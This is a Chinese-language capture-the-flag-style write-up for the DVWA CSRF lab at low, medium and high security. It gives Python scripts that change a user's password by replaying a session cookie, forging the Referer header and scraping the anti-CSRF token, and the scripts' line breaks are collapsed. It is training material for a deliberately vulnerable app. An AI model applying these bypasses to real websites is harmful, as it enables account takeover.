DVWA - CSRF (low, medium, high)

low

设置一下cookie的PHPSESSID和security即可跨站请求

import requestsdef main():url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'headers = {'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',}new_password = 'ac'url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)res = requests.get(url, headers=headers)if 'Password Changed.' in res.content:print('Yes')else:print('No')if __name__ == '__main__':main()

medium

查看源码，发现

// Checks to see where the request came from 
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

根据Referer验证请求来源，绕过思路：在HTTP请求头声明Referer。

import requestsdef main():url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'headers = {'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium','Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'}new_password = 'ac'url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)res = requests.get(url, headers=headers)if 'Password Changed.' in res.content:print('Yes')else:print('No')if __name__ == '__main__':main()

high

查看源码，发现多了动态user_token验证

// Check Anti-CSRF token 
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

绕过思路：在代码层面发跨站请求动态获取user_token，再发跨站请求修改密码。

import requests
import redef main():url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'headers = {'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high','Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'       }res = requests.get(url, headers=headers)m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)if m:user_token = m.group(1)new_password = 'ac'url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)res = requests.get(url, headers=headers)if 'Password Changed.' in res.content:print('Yes')else:print('No')print(res.content)if __name__ == '__main__':main()

注：这3个实验要跨站，别一直都在本地同一个浏览器测试，这没意思。